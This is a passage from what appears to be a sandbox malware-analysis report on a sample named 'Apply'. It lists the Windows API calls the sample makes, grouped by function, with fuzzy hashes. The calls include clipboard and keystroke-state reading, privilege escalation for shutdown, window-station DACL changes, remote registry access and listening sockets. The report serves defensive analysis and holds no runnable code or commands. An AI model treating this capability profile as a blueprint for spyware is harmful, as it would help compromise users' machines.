                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008B19F2
                                                      • Part of subcall function 008B17A1: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008B18DE), ref: 008B17B6
                                                      • Part of subcall function 008B17A1: CloseHandle.KERNEL32(?,?,008B18DE), ref: 008B17CB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                    • String ID: $default$winsta0
                                                    • API String ID: 22674027-1027155976
                                                    • Opcode ID: 2915ef2dc515c8ee9c7c24775c46924c6aaada9eee075ce735ca6c3aa8e64903
                                                    • Instruction ID: b77e1979d19dc4f703114dbcb964f8e363563663e17c3e52b2318bcef884ecd3
                                                    • Opcode Fuzzy Hash: 2915ef2dc515c8ee9c7c24775c46924c6aaada9eee075ce735ca6c3aa8e64903
                                                    • Instruction Fuzzy Hash: 49817871900249AFDF219FA4DC99FEE7BB8FF04314F544029F914EA2A0E7318A59CB60
                                                    APIs
                                                      • Part of subcall function 008B17DB: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008B17F6
                                                      • Part of subcall function 008B17DB: GetLastError.KERNEL32(?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1802
                                                      • Part of subcall function 008B17DB: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1811
                                                      • Part of subcall function 008B17DB: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1818
                                                      • Part of subcall function 008B17DB: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008B182F
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008B12AE
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008B12E2
                                                    • GetLengthSid.ADVAPI32(?), ref: 008B12F9
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 008B1333
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008B134F
                                                    • GetLengthSid.ADVAPI32(?), ref: 008B1366
                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 008B136E
                                                    • HeapAlloc.KERNEL32(00000000), ref: 008B1375
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008B1396
                                                    • CopySid.ADVAPI32(00000000), ref: 008B139D
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008B13CC
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008B13EE
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008B1400
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1427
                                                    • HeapFree.KERNEL32(00000000), ref: 008B142E
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1437
                                                    • HeapFree.KERNEL32(00000000), ref: 008B143E
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1447
                                                    • HeapFree.KERNEL32(00000000), ref: 008B144E
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 008B145A
                                                    • HeapFree.KERNEL32(00000000), ref: 008B1461
                                                      • Part of subcall function 008B1875: GetProcessHeap.KERNEL32(00000008,008B1293,?,00000000,?,008B1293,?), ref: 008B1883
                                                      • Part of subcall function 008B1875: HeapAlloc.KERNEL32(00000000,?,00000000,?,008B1293,?), ref: 008B188A
                                                      • Part of subcall function 008B1875: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,008B1293,?), ref: 008B1899
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                    • String ID:
                                                    • API String ID: 4175595110-0
                                                    • Opcode ID: 55f497d4a61b5367f6ab8db1880dc595733a61d6639ee677bd9aa4cb690de623
                                                    • Instruction ID: f01c6436903b7f9e21329098079553a4ce563b635eba4e206d57a094cc071711
                                                    • Opcode Fuzzy Hash: 55f497d4a61b5367f6ab8db1880dc595733a61d6639ee677bd9aa4cb690de623
                                                    • Instruction Fuzzy Hash: BE714AB2900209ABDF10DFA5DC88BEEBBB9FF04350F548125E915EF291D7719A05CBA0
                                                    APIs
                                                    • OpenClipboard.USER32(008EDC1C), ref: 008CF2B0
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 008CF2BE
                                                    • GetClipboardData.USER32(0000000D), ref: 008CF2CA
                                                    • CloseClipboard.USER32 ref: 008CF2D6
                                                    • GlobalLock.KERNEL32(00000000), ref: 008CF30E
                                                    • CloseClipboard.USER32 ref: 008CF318
                                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 008CF343
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 008CF350
                                                    • GetClipboardData.USER32(00000001), ref: 008CF358
                                                    • GlobalLock.KERNEL32(00000000), ref: 008CF369
                                                    • GlobalUnlock.KERNEL32(00000000,?), ref: 008CF3A9
                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 008CF3BF
                                                    • GetClipboardData.USER32(0000000F), ref: 008CF3CB
                                                    • GlobalLock.KERNEL32(00000000), ref: 008CF3DC
                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 008CF3FE
                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 008CF41B
                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 008CF459
                                                    • GlobalUnlock.KERNEL32(00000000,?,?), ref: 008CF47A
                                                    • CountClipboardFormats.USER32 ref: 008CF49B
                                                    • CloseClipboard.USER32 ref: 008CF4E0
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                    • String ID:
                                                    • API String ID: 420908878-0
                                                    • Opcode ID: 09f298c1dd2828bd589487ad3377fe477648f818c75badfa3f1aae51afcbb243
                                                    • Instruction ID: f94d9e51b94dd32ea11107a9ec5f663a84b082e16a97b69edaff67b10f086545
                                                    • Opcode Fuzzy Hash: 09f298c1dd2828bd589487ad3377fe477648f818c75badfa3f1aae51afcbb243
                                                    • Instruction Fuzzy Hash: 5C617B30204341AFE314EB24D884F2ABBB5FF84715F14456DF956CB2A2DB71E949CBA2
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 008C712D
                                                    • FindClose.KERNEL32(00000000), ref: 008C7181
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008C71BD
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008C71E4
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 008C7221
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 008C724E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                    • API String ID: 3830820486-3289030164
                                                    • Opcode ID: b659e023a2ad9a4f20dea18066351cf518087cca9d97349401191ace6d07643c
                                                    • Instruction ID: 61562cd090891199450740c6435f9e68fa49a406dff360a05e2a0bfd436bafaa
                                                    • Opcode Fuzzy Hash: b659e023a2ad9a4f20dea18066351cf518087cca9d97349401191ace6d07643c
                                                    • Instruction Fuzzy Hash: C3D13E72508340AFC714DBA8D885EABB7E8FF88705F44491DF985C6292EB74D948CB63
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008C44AF
                                                    • _wcslen.LIBCMT ref: 008C44DC
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C450C
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008C452D
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 008C453D
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008C45C4
                                                    • CloseHandle.KERNEL32(00000000), ref: 008C45CF
                                                    • CloseHandle.KERNEL32(00000000), ref: 008C45DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 1149970189-3457252023
                                                    • Opcode ID: 344f8798f98786a2a1d9cdd4bfe1ea4a2bf7a2f785d32b2ca5608a5b3803ddd9
                                                    • Instruction ID: 7ddde45050efe6973f8c96af089123928594a5ff2160292131f0454652de1cc9
                                                    • Opcode Fuzzy Hash: 344f8798f98786a2a1d9cdd4bfe1ea4a2bf7a2f785d32b2ca5608a5b3803ddd9
                                                    • Instruction Fuzzy Hash: FA31C3B1900249ABDB219FA4DC49FEB77BCFF88700F1050A9F619D61A0E770D7848B20
                                                    APIs
                                                      • Part of subcall function 008DD11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DBE35,?,?), ref: 008DD13C
                                                      • Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD178
                                                      • Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD1E6
                                                      • Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD21C
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC6C5
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 008DC730
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 008DC754
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008DC7B3
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008DC86E
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 008DC8DB
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 008DC970
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 008DC9C1
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 008DCA6A
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008DCB09
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 008DCB16
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                    • String ID:
                                                    • API String ID: 3102970594-0
                                                    • Opcode ID: 765eec73b687a3ac99e38bf00c3a56055e853070cdf24242aef3b7f3474cdde3
                                                    • Instruction ID: 9587a96487075f4c636b06b518a156b994e63209b3f909ab73b86cd66cedc7f6
                                                    • Opcode Fuzzy Hash: 765eec73b687a3ac99e38bf00c3a56055e853070cdf24242aef3b7f3474cdde3
                                                    • Instruction Fuzzy Hash: D4022B716042159FC715DF28C891A2ABBE5FF48314F18859DF849CB3A2DB31ED46CB92
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 008BA397
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 008BA418
                                                    • GetKeyState.USER32(000000A0), ref: 008BA433
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 008BA44D
                                                    • GetKeyState.USER32(000000A1), ref: 008BA462
                                                    • GetAsyncKeyState.USER32(00000011), ref: 008BA47A
                                                    • GetKeyState.USER32(00000011), ref: 008BA48C
                                                    • GetAsyncKeyState.USER32(00000012), ref: 008BA4A4
                                                    • GetKeyState.USER32(00000012), ref: 008BA4B6
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 008BA4CE
                                                    • GetKeyState.USER32(0000005B), ref: 008BA4E0
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 62e4a494836a92e35be211e7375908b2e33707ff47c1115a47d3291b9087c0d8
                                                    • Instruction ID: a448de8a0cd01010c843dbdb38c8198230355d0a302d0e78b967aaacd65e54f8
                                                    • Opcode Fuzzy Hash: 62e4a494836a92e35be211e7375908b2e33707ff47c1115a47d3291b9087c0d8
                                                    • Instruction Fuzzy Hash: 7D41A4205047CA69FF39976488083F6BEE0FB25304F048059D5C69A3C2EBE599C88767
                                                    APIs
                                                      • Part of subcall function 00853FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00853E0E,?,?,00892A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 00854017
                                                      • Part of subcall function 008BE7DA: GetFileAttributesW.KERNEL32(?,008BD57A), ref: 008BE7DB
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 008BD707
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 008BD7C2
                                                    • MoveFileW.KERNEL32(?,?), ref: 008BD7D5
                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 008BD7F2
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 008BD81C
                                                      • Part of subcall function 008BD881: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,008BD801,?,?), ref: 008BD897
                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 008BD838
                                                    • FindClose.KERNEL32(00000000), ref: 008BD849
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 1946585618-1173974218
                                                    • Opcode ID: 7169fcda2511b7fa45bfdbac9e8537ab291f083f2a555adcd89eb7ec505808c6
                                                    • Instruction ID: 5462105160b4daaa63a56ecea6bdbade71e4e8c8af1e2fd1af3e4870dd72f5e6
                                                    • Opcode Fuzzy Hash: 7169fcda2511b7fa45bfdbac9e8537ab291f083f2a555adcd89eb7ec505808c6
                                                    • Instruction Fuzzy Hash: 3A613B3180124DABCF05EBA8D9929EDBBB5FF15301F204565E845F6292EB316F0DCB62
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: 634152b700617c7280d05a45f9bd83abacab1fe239eda4fd052740f42435767a
                                                    • Instruction ID: 305b8f218d1d67e75d8de9c96b4c56fdbf9a8a8048fb5e6a14f8fe39e862abf2
                                                    • Opcode Fuzzy Hash: 634152b700617c7280d05a45f9bd83abacab1fe239eda4fd052740f42435767a
                                                    • Instruction Fuzzy Hash: 02417731204651AFE720DF29E888F15BBA1FF54318F14C0A9EA298F662D775ED46CB90
                                                    APIs
                                                      • Part of subcall function 008B1DA5: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008B1DEF
                                                      • Part of subcall function 008B1DA5: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008B1E1C
                                                      • Part of subcall function 008B1DA5: GetLastError.KERNEL32 ref: 008B1E2C
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 008BEF73
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $ $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-3163812486
                                                    • Opcode ID: 8a6aa0f3ab97d3e63d486041cb1b8231436aa944c37da49bfd1974f78248a88a
                                                    • Instruction ID: 210ac2882db8ac6e79e74be559a124a60144dbfde10ef42e93607ecc847cddf0
                                                    • Opcode Fuzzy Hash: 8a6aa0f3ab97d3e63d486041cb1b8231436aa944c37da49bfd1974f78248a88a
                                                    • Instruction Fuzzy Hash: BA01D672620315AFEB2466B89CC9FFF766CFB44384F150461FD02EA3D2DE649D448194
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008D19FD
                                                    • WSAGetLastError.WSOCK32 ref: 008D1A0A
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 008D1A41
                                                    • WSAGetLastError.WSOCK32 ref: 008D1A4C
                                                    • closesocket.WSOCK32(00000000), ref: 008D1A7B
                                                    • listen.WSOCK32(00000000,00000005), ref: 008D1A8A
                                                    • WSAGetLastError.WSOCK32 ref: 008D1A94
                                                    • closesocket.WSOCK32(00000000), ref: 008D1AC3
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                    • String ID:
                                                    • API String ID: 540024437-0
                                                    • Opcode ID: 162f5dd06f4a883ac506597594d1d84a64caa5fe28035afa6bddbe2b49a255c7
                                                    • Instruction ID: d68012dbc8be4780008fb0e55f0f72f5eebff47eab98cdbaf592a21b0f97220b
                                                    • Opcode Fuzzy Hash: 162f5dd06f4a883ac506597594d1d84a64caa5fe28035afa6bddbe2b49a255c7
                                                    • Instruction Fuzzy Hash: 92417131600250AFDB10DF28C499B29BBE5FF45318F188299E8568F392C771EC85CBE1
                                                    APIs
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 008CA2E7
                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 008CA3FA
                                                      • Part of subcall function 008C3FE3: GetInputState.USER32 ref: 008C403A
                                                      • Part of subcall function 008C3FE3: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008C40D5
                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 008CA317
                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 008CA3E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                    • String ID: *.*
                                                    • API String ID: 1972594611-438819550
                                                    • Opcode ID: 62730dd4e46299c941daaec4449235c7a2eb0a546b7bace36232cc3166e1b92c
                                                    • Instruction ID: f4002b8d0b7ba9c14f43e425fffcdcd3ff0a2dba1cb34779a271dabb4a363f98
                                                    • Opcode Fuzzy Hash: 62730dd4e46299c941daaec4449235c7a2eb0a546b7bace36232cc3166e1b92c
                                                    • Instruction Fuzzy Hash: 42415D7190024D9FCF18DFA8C995AEEBBB4FF05315F20415AE805E6291E771DE88CB52
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: f67910109f6956242e07d1853e9dfed1f1e2a717c7cb712259268f06a8b5e9ef
                                                    • Instruction ID: 6cce7e5f64b352d996f7bda79dddbad7125cb6127244cb1771bd97b3c26c4361
                                                    • Opcode Fuzzy Hash: f67910109f6956242e07d1853e9dfed1f1e2a717c7cb712259268f06a8b5e9ef
                                                    • Instruction Fuzzy Hash: 8F21F4317002909FD7209F2BC844B1A7BE8FF96319F19806CE849CB292DB71DD42CB95
                                                    APIs
                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 008CD5F8
